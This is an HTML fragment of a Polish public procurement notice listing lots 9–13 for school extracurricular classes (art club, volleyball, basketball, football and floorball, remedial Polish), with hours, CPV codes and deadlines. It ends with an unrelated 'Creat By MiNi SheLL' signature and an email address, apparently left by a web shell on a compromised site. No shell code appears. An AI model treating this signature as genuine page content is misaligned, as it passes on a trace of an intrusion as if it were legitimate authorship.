<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć w ramach Koła  plastycznego  od  dnia podpisania umowy do  końca  roku  szkolnego w czerwcu 2013 r. (z wyłączeniem ferii letnich), w wymiarze przeciętnie 2 godz. dydaktyczne tygodniowo,  nie więcej niż 74 godz. w roku szkolnym. Zajęcia dla uczniów Techników (minimum 6 osób rocznie) rozwijające uzdolnienia plastyczne i zainteresowanie sztuką oraz przygotowujące chętnych uczestników do egzaminów z rysunku na wyższe uczelnie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Prowadzenie zajęć w  ramach Sekcji siatkówki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć w  ramach Sekcji siatkówki  od  dnia podpisania umowy  do  końca  roku  szkolnego w czerwcu 2013 r. (z wyłączeniem ferii letnich), w wymiarze przeciętnie 2 godz. dydaktyczne tygodniowo,  nie więcej niż 74 godz. w roku szkolnym. Zajęcia dla uczniów Techników i Zasadniczej Szkoły Zawodowej (minimum 14 osób rocznie) podnoszące sprawność fizyczną uczestników, rozwijające umiejętności istotne w piłce siatkowej oraz współpracę 
w grupie i przygotowujące młodzież do  udziału  w  zawodach  sportowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Prowadzenie  zajęć w  ramach Sekcji  koszykówki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie  zajęć w  ramach Sekcji  koszykówki  od  dnia podpisania umowy do końca  roku  szkolnego w czerwcu 2013 r. (z wyłączeniem ferii letnich), w wymiarze przeciętnie 2 godz. dydaktyczne tygodniowo,  nie więcej niż 74 godz. w roku szkolnym. Zajęcia dla uczniów Techników i Zasadniczej Szkoły Zawodowej (minimum 14 osób rocznie) podnoszące sprawność fizyczną uczestników, rozwijające umiejętności istotne w piłce koszykowej oraz współpracę 
w grupie i przygotowujące młodzież do  udziału  w  zawodach  sportowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Prowadzenie zajęć w ramach Sekcji piłki nożnej i  unihokeja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć w ramach Sekcji piłki nożnej i  unihokeja  od  dnia  podpisania umowy do końca  roku  szkolnego w czerwcu 2013 r. (z wyłączeniem ferii letnich), w wymiarze przeciętnie 2 godz. dydaktyczne tygodniowo,  nie więcej niż 74 godz. w roku szkolnym. Zajęcia dla uczniów Techników i Zasadniczej Szkoły Zawodowej (minimum 14 osób rocznie) podnoszące sprawność fizyczną uczestników, rozwijające umiejętności istotne dla ww. dyscyplin sportowych oraz współpracę w grupie i przygotowujące młodzież do  udziału  w  zawodach  sportowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Prowadzenie zajęć dodatkowych z języka polskiego w klasie IIF ZSZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć dodatkowych z języka polskiego w klasie IIF ZSZ od dnia podpisania umowy do końca  roku  szkolnego w czerwcu 2012 r. w wymiarze przeciętnie 1 godz. dydaktyczne tygodniowo, nie więcej niż 30 godz. w roku szkolnym. Zajęcia dla uczniów Zasadniczej Szkoły Zawodowej rozwijające kluczowe umiejętności z języka ojczystego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Prowadzenie zajęć dodatkowych z języka polskiego w klasie IF ZSZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć dodatkowych z języka polskiego w klasie IF ZSZ od dnia 1 września 2012 r. 
do końca roku szkolnego w czerwcu 2013 r. w wymiarze przeciętnie 1 godz. dydaktyczne tygodniowo, nie więcej niż 36 godz. w roku szkolnym. Zajęcia dla uczniów Zasadniczej Szkoły Zawodowej wyrównujące dysproporcje w umiejętnościach edukacyjnych z języka ojczystego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com